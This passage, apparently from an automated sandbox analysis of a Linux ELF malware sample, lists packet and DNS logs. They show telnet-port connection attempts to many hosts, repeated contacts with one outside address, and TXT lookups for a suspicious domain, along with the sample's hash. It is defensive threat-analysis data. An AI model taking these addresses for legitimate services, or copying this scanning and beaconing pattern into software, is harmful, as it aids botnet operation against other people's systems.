                                                    Jan 4, 2025 14:12:48.164196014 CET235443817.199.119.32192.168.2.23
                                                    Jan 4, 2025 14:12:48.164267063 CET5443823192.168.2.2317.199.119.32
                                                    Jan 4, 2025 14:12:48.165446997 CET5194423192.168.2.239.154.164.42
                                                    Jan 4, 2025 14:12:48.167572021 CET2353496132.205.38.242192.168.2.23
                                                    Jan 4, 2025 14:12:48.167650938 CET5349623192.168.2.23132.205.38.242
                                                    Jan 4, 2025 14:12:48.171607971 CET23519449.154.164.42192.168.2.23
                                                    Jan 4, 2025 14:12:48.171858072 CET5194423192.168.2.239.154.164.42
                                                    Jan 4, 2025 14:12:48.175200939 CET3811223192.168.2.23176.165.177.4
                                                    Jan 4, 2025 14:12:48.181334972 CET2338112176.165.177.4192.168.2.23
                                                    Jan 4, 2025 14:12:48.181437016 CET3811223192.168.2.23176.165.177.4
                                                    Jan 4, 2025 14:12:48.197035074 CET5678623192.168.2.23148.229.207.112
                                                    Jan 4, 2025 14:12:48.203068972 CET2356786148.229.207.112192.168.2.23
                                                    Jan 4, 2025 14:12:48.203121901 CET5678623192.168.2.23148.229.207.112
                                                    Jan 4, 2025 14:12:48.206427097 CET5678623192.168.2.23148.229.207.112
                                                    Jan 4, 2025 14:12:48.206429958 CET3811223192.168.2.23176.165.177.4
                                                    Jan 4, 2025 14:12:48.206430912 CET5349623192.168.2.23132.205.38.242
                                                    Jan 4, 2025 14:12:48.206439972 CET5657423192.168.2.23111.20.77.101
                                                    Jan 4, 2025 14:12:48.206443071 CET3982423192.168.2.237.225.0.137
                                                    Jan 4, 2025 14:12:48.206449986 CET5194423192.168.2.239.154.164.42
                                                    Jan 4, 2025 14:12:48.206465006 CET5443823192.168.2.2317.199.119.32
                                                    Jan 4, 2025 14:12:48.211296082 CET2338112176.165.177.4192.168.2.23
                                                    Jan 4, 2025 14:12:48.211435080 CET2353496132.205.38.242192.168.2.23
                                                    Jan 4, 2025 14:12:48.211443901 CET2356786148.229.207.112192.168.2.23
                                                    Jan 4, 2025 14:12:48.211453915 CET2356574111.20.77.101192.168.2.23
                                                    Jan 4, 2025 14:12:48.211462975 CET23398247.225.0.137192.168.2.23
                                                    Jan 4, 2025 14:12:48.211464882 CET3811223192.168.2.23176.165.177.4
                                                    Jan 4, 2025 14:12:48.211477041 CET5678623192.168.2.23148.229.207.112
                                                    Jan 4, 2025 14:12:48.211479902 CET23519449.154.164.42192.168.2.23
                                                    Jan 4, 2025 14:12:48.211488962 CET235443817.199.119.32192.168.2.23
                                                    Jan 4, 2025 14:12:48.211522102 CET5657423192.168.2.23111.20.77.101
                                                    Jan 4, 2025 14:12:48.211524963 CET5349623192.168.2.23132.205.38.242
                                                    Jan 4, 2025 14:12:48.211528063 CET3982423192.168.2.237.225.0.137
                                                    Jan 4, 2025 14:12:48.211541891 CET5443823192.168.2.2317.199.119.32
                                                    Jan 4, 2025 14:12:48.211544991 CET5194423192.168.2.239.154.164.42
                                                    Jan 4, 2025 14:12:48.247680902 CET4951264715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:12:48.252408028 CET6471549512188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:12:48.252459049 CET4951264715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:12:48.811506033 CET43928443192.168.2.2391.189.91.42
                                                    Jan 4, 2025 14:12:49.074649096 CET6471549512188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:12:49.074721098 CET4951264715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:12:49.255419970 CET4951264715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:12:49.260427952 CET6471549512188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:12:49.260478020 CET4951264715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:12:54.442718029 CET42836443192.168.2.2391.189.91.43
                                                    Jan 4, 2025 14:12:55.982506990 CET4251680192.168.2.23109.202.202.202
                                                    Jan 4, 2025 14:13:03.935434103 CET3384231428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:03.940269947 CET3142833842188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:03.940323114 CET3384231428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:04.857000113 CET3142833842188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:04.857055902 CET3384231428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:04.936013937 CET3384231428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:04.941060066 CET3142833842188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:04.941103935 CET3384231428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:10.056591034 CET43928443192.168.2.2391.189.91.42
                                                    Jan 4, 2025 14:13:19.464868069 CET4951664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:19.469713926 CET6471549516188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:19.469774008 CET4951664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:20.276181936 CET6471549516188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:20.276245117 CET4951664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:20.295169115 CET42836443192.168.2.2391.189.91.43
                                                    Jan 4, 2025 14:13:20.465718031 CET4951664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:20.470639944 CET6471549516188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:20.470691919 CET4951664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:26.438332081 CET4251680192.168.2.23109.202.202.202
                                                    Jan 4, 2025 14:13:35.125319958 CET3371262849192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:35.130175114 CET6284933712188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:35.130239964 CET3371262849192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:35.945082903 CET6284933712188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:35.945146084 CET3371262849192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:36.126213074 CET3371262849192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:36.131450891 CET6284933712188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:36.131520987 CET3371262849192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:48.638691902 CET546605837192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:48.643476009 CET583754660188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:48.643522978 CET546605837192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:49.474884987 CET583754660188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:49.474957943 CET546605837192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:49.639527082 CET546605837192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:49.644654036 CET583754660188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:13:49.644694090 CET546605837192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:13:51.010956049 CET43928443192.168.2.2391.189.91.42
                                                    Jan 4, 2025 14:14:02.129604101 CET5857810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:02.134385109 CET1032158578188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:02.134476900 CET5857810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:02.943300962 CET1032158578188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:02.943372965 CET5857810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:03.130414963 CET5857810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:03.135420084 CET1032158578188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:03.135484934 CET5857810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:11.488152981 CET42836443192.168.2.2391.189.91.43
                                                    Jan 4, 2025 14:14:19.775274992 CET5858010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:19.780142069 CET1032158580188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:19.780200958 CET5858010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:20.599905968 CET1032158580188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:20.600020885 CET5858010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:20.776067019 CET5858010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:20.781112909 CET1032158580188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:20.781164885 CET5858010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:31.360173941 CET4952664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:31.365056992 CET6471549526188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:31.365101099 CET4952664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:32.169802904 CET6471549526188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:32.169857979 CET4952664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:32.360953093 CET4952664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:32.366014004 CET6471549526188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:32.366067886 CET4952664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:48.859319925 CET4952864715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:48.864303112 CET6471549528188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:48.864363909 CET4952864715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:49.742186069 CET6471549528188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:49.742240906 CET4952864715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:49.860135078 CET4952864715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:14:49.865462065 CET6471549528188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:14:49.865513086 CET4952864715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:04.404320955 CET3295418234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:04.409138918 CET1823432954188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:04.409260988 CET3295418234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:05.237159014 CET1823432954188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:05.237253904 CET3295418234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:05.405184031 CET3295418234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:05.410248995 CET1823432954188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:05.410329103 CET3295418234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:15.919008970 CET3295618234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:15.923772097 CET1823432956188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:15.923894882 CET3295618234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:16.730473995 CET1823432956188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:16.730560064 CET3295618234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:16.920038939 CET3295618234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:16.925117970 CET1823432956188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:16.925194025 CET3295618234192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:27.401273966 CET5859010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:27.406094074 CET1032158590188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:27.406187057 CET5859010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:28.224472046 CET1032158590188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:28.224548101 CET5859010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:28.402374029 CET5859010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:28.407521963 CET1032158590188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:28.407599926 CET5859010321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:40.917351007 CET4953664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:40.922241926 CET6471549536188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:40.922297001 CET4953664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:41.747596025 CET6471549536188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:41.747653961 CET4953664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:41.917967081 CET4953664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:41.925303936 CET6471549536188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:41.925358057 CET4953664715192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:52.443356991 CET5820649657192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:52.448194981 CET4965758206188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:52.448271990 CET5820649657192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:53.254070997 CET4965758206188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:53.254142046 CET5820649657192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:53.443980932 CET5820649657192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:15:53.449172974 CET4965758206188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:15:53.449224949 CET5820649657192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:03.909892082 CET3386831428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:03.914630890 CET3142833868188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:16:03.914676905 CET3386831428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:04.719907999 CET3142833868188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:16:04.719966888 CET3386831428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:04.910511017 CET3386831428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:04.915494919 CET3142833868188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:16:04.915535927 CET3386831428192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:15.574822903 CET5859810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:15.579665899 CET1032158598188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:16:15.579720974 CET5859810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:16.384742022 CET1032158598188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:16:16.384802103 CET5859810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:16.576159000 CET5859810321192.168.2.23188.166.182.194
                                                    Jan 4, 2025 14:16:16.581178904 CET1032158598188.166.182.194192.168.2.23
                                                    Jan 4, 2025 14:16:16.581228018 CET5859810321192.168.2.23188.166.182.194

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Jan 4, 2025 14:12:48.235083103 CET3982653192.168.2.2351.77.149.139
                                                    Jan 4, 2025 14:12:48.245115995 CET533982651.77.149.139192.168.2.23
                                                    Jan 4, 2025 14:12:49.255481005 CET5627819302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:12:49.881153107 CET193025627874.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:12:59.886010885 CET4672053192.168.2.23134.195.4.2
                                                    Jan 4, 2025 14:13:01.897730112 CET5018553192.168.2.2394.16.114.254
                                                    Jan 4, 2025 14:13:03.917438984 CET3606753192.168.2.2351.158.108.203
                                                    Jan 4, 2025 14:13:03.933132887 CET533606751.158.108.203192.168.2.23
                                                    Jan 4, 2025 14:13:04.936063051 CET6068019302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:13:05.398803949 CET193026068074.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:13:15.407073975 CET3415853192.168.2.2394.16.114.254
                                                    Jan 4, 2025 14:13:17.415596008 CET4648753192.168.2.23134.195.4.2
                                                    Jan 4, 2025 14:13:19.431332111 CET3556653192.168.2.23185.181.61.24
                                                    Jan 4, 2025 14:13:19.464536905 CET5335566185.181.61.24192.168.2.23
                                                    Jan 4, 2025 14:13:20.465765953 CET5183919302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:13:21.064127922 CET193025183974.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:13:31.069724083 CET5137553192.168.2.2351.254.162.59
                                                    Jan 4, 2025 14:13:33.093446970 CET5523353192.168.2.23178.254.22.166
                                                    Jan 4, 2025 14:13:35.109175920 CET5410053192.168.2.2351.158.108.203
                                                    Jan 4, 2025 14:13:35.124938965 CET535410051.158.108.203192.168.2.23
                                                    Jan 4, 2025 14:13:36.126265049 CET5138419302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:13:36.588231087 CET193025138474.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:13:46.595640898 CET3547453192.168.2.23134.195.4.2
                                                    Jan 4, 2025 14:13:48.611323118 CET5481953192.168.2.2381.169.136.222
                                                    Jan 4, 2025 14:13:48.638384104 CET535481981.169.136.222192.168.2.23
                                                    Jan 4, 2025 14:13:49.639564037 CET4923619302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:13:50.089092016 CET193024923674.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:14:00.097786903 CET4304153192.168.2.2351.254.162.59
                                                    Jan 4, 2025 14:14:02.113466978 CET4548953192.168.2.2351.158.108.203
                                                    Jan 4, 2025 14:14:02.129256010 CET534548951.158.108.203192.168.2.23
                                                    Jan 4, 2025 14:14:03.130436897 CET4325219302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:14:03.716217995 CET193024325274.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:14:13.724520922 CET3516653192.168.2.23178.254.22.166
                                                    Jan 4, 2025 14:14:15.743604898 CET5093453192.168.2.2391.217.137.37
                                                    Jan 4, 2025 14:14:17.759321928 CET3312853192.168.2.2391.217.137.37
                                                    Jan 4, 2025 14:14:20.776108027 CET4555819302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:14:21.342746019 CET193024555874.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:14:31.351006031 CET4688353192.168.2.2351.77.149.139
                                                    Jan 4, 2025 14:14:31.359850883 CET534688351.77.149.139192.168.2.23
                                                    Jan 4, 2025 14:14:32.360987902 CET4330019302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:14:32.815633059 CET193024330074.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:14:42.823885918 CET5175553192.168.2.23134.195.4.2
                                                    Jan 4, 2025 14:14:44.827610970 CET3354653192.168.2.2391.217.137.37
                                                    Jan 4, 2025 14:14:46.843338966 CET3536453192.168.2.2351.254.162.59
                                                    Jan 4, 2025 14:14:49.860177040 CET5257519302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:14:50.334353924 CET193025257574.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:15:00.341486931 CET4081353192.168.2.2351.254.162.59
                                                    Jan 4, 2025 14:15:02.361206055 CET6072453192.168.2.23134.195.4.2
                                                    Jan 4, 2025 14:15:04.376945972 CET4187053192.168.2.2381.169.136.222
                                                    Jan 4, 2025 14:15:04.403955936 CET534187081.169.136.222192.168.2.23
                                                    Jan 4, 2025 14:15:05.405230045 CET3873019302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:15:05.896918058 CET193023873074.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:15:15.903388977 CET5264753192.168.2.2351.158.108.203
                                                    Jan 4, 2025 14:15:15.918631077 CET535264751.158.108.203192.168.2.23
                                                    Jan 4, 2025 14:15:16.920087099 CET5758119302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:15:17.385405064 CET193025758174.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:15:27.393826962 CET4110953192.168.2.23195.10.195.195
                                                    Jan 4, 2025 14:15:27.400748014 CET5341109195.10.195.195192.168.2.23
                                                    Jan 4, 2025 14:15:28.402426004 CET4866519302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:15:28.866406918 CET193024866574.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:15:38.874509096 CET4334753192.168.2.23134.195.4.2
                                                    Jan 4, 2025 14:15:40.883910894 CET5962953192.168.2.23185.181.61.24
                                                    Jan 4, 2025 14:15:40.917042971 CET5359629185.181.61.24192.168.2.23
                                                    Jan 4, 2025 14:15:41.918009996 CET5114819302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:15:42.427607059 CET193025114874.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:15:52.434330940 CET3706253192.168.2.23195.10.195.195
                                                    Jan 4, 2025 14:15:52.443065882 CET5337062195.10.195.195192.168.2.23
                                                    Jan 4, 2025 14:15:53.444030046 CET3539719302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:15:53.893148899 CET193023539774.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:16:03.900814056 CET5660153192.168.2.2351.77.149.139
                                                    Jan 4, 2025 14:16:03.909590960 CET535660151.77.149.139192.168.2.23
                                                    Jan 4, 2025 14:16:04.910551071 CET3643819302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:16:05.552083015 CET193023643874.125.250.129192.168.2.23
                                                    Jan 4, 2025 14:16:15.559180975 CET5983553192.168.2.2351.158.108.203
                                                    Jan 4, 2025 14:16:15.574409008 CET535983551.158.108.203192.168.2.23
                                                    Jan 4, 2025 14:16:16.576205969 CET5307119302192.168.2.2374.125.250.129
                                                    Jan 4, 2025 14:16:17.041625023 CET193025307174.125.250.129192.168.2.23

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Jan 4, 2025 14:12:48.235083103 CET192.168.2.2351.77.149.1390x2336Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:12:59.886010885 CET192.168.2.23134.195.4.20x3882Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:01.897730112 CET192.168.2.2394.16.114.2540x75e0Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:03.917438984 CET192.168.2.2351.158.108.2030x4d17Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:15.407073975 CET192.168.2.2394.16.114.2540xa0c0Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:17.415596008 CET192.168.2.23134.195.4.20xad6bStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:19.431332111 CET192.168.2.23185.181.61.240x6b0dStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:31.069724083 CET192.168.2.2351.254.162.590x18efStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:33.093446970 CET192.168.2.23178.254.22.1660xaddStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:35.109175920 CET192.168.2.2351.158.108.2030xefStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:46.595640898 CET192.168.2.23134.195.4.20xe064Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:13:48.611323118 CET192.168.2.2381.169.136.2220x784Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:00.097786903 CET192.168.2.2351.254.162.590x8168Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:02.113466978 CET192.168.2.2351.158.108.2030x8a6aStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:13.724520922 CET192.168.2.23178.254.22.1660xd7f2Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:15.743604898 CET192.168.2.2391.217.137.370xa70fStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:17.759321928 CET192.168.2.2391.217.137.370x696cStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:31.351006031 CET192.168.2.2351.77.149.1390xe2a9Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:42.823885918 CET192.168.2.23134.195.4.20xcc69Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:44.827610970 CET192.168.2.2391.217.137.370x1f50Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:14:46.843338966 CET192.168.2.2351.254.162.590xcf84Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:15:00.341486931 CET192.168.2.2351.254.162.590x364eStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:15:02.361206055 CET192.168.2.23134.195.4.20xdba7Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:15:04.376945972 CET192.168.2.2381.169.136.2220x5e1dStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:15:15.903388977 CET192.168.2.2351.158.108.2030x4ed4Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:15:27.393826962 CET192.168.2.23195.10.195.1950xf67aStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:15:38.874509096 CET192.168.2.23134.195.4.20xc7eStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:15:40.883910894 CET192.168.2.23185.181.61.240xdbc7Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:15:52.434330940 CET192.168.2.23195.10.195.1950xaa95Standard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:16:03.900814056 CET192.168.2.2351.77.149.1390xe46dStandard query (0)ai.stackoverflow.libre16IN (0x0001)false
                                                    Jan 4, 2025 14:16:15.559180975 CET192.168.2.2351.158.108.2030xc3d1Standard query (0)ai.stackoverflow.libre16IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Jan 4, 2025 14:12:48.245115995 CET51.77.149.139192.168.2.230x2336No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:13:03.933132887 CET51.158.108.203192.168.2.230x4d17No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:13:19.464536905 CET185.181.61.24192.168.2.230x6b0dNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:13:35.124938965 CET51.158.108.203192.168.2.230xefNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:13:48.638384104 CET81.169.136.222192.168.2.230x784No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:14:02.129256010 CET51.158.108.203192.168.2.230x8a6aNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:14:31.359850883 CET51.77.149.139192.168.2.230xe2a9No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:15:04.403955936 CET81.169.136.222192.168.2.230x5e1dNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:15:15.918631077 CET51.158.108.203192.168.2.230x4ed4No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:15:27.400748014 CET195.10.195.195192.168.2.230xf67aNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:15:40.917042971 CET185.181.61.24192.168.2.230xdbc7No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:15:52.443065882 CET195.10.195.195192.168.2.230xaa95No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:16:03.909590960 CET51.77.149.139192.168.2.230xe46dNo error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false
                                                    Jan 4, 2025 14:16:15.574409008 CET51.158.108.203192.168.2.230xc3d1No error (0)ai.stackoverflow.libreTXT (Text strings)IN (0x0001)false

                                                    System Behavior

                                                    General

                                                    Start time (UTC):13:12:46
                                                    Start date (UTC):04/01/2025
                                                    Path:/tmp/i686.elf
                                                    Arguments:/tmp/i686.elf
                                                    File size:91504 bytes
                                                    MD5 hash:de886e3e02a867403aebfc5f52c0c7e7

                                                    Chronological Activities


                                                    General

                                                    Start time (UTC):13:12:47
                                                    Start date (UTC):04/01/2025
                                                    Path:/tmp/i686.elf
                                                    Arguments:-
                                                    File size:91504 bytes
                                                    MD5 hash:de886e3e02a867403aebfc5f52c0c7e7

                                                    Chronological Activities


                                                    General

                                                    Start time (UTC):13:12:47
                                                    Start date (UTC):04/01/2025
                                                    Path:/tmp/i686.elf
                                                    Arguments:-
                                                    File size:91504 bytes
                                                    MD5 hash:de886e3e02a867403aebfc5f52c0c7e7

                                                    Chronological Activities


                                                    General

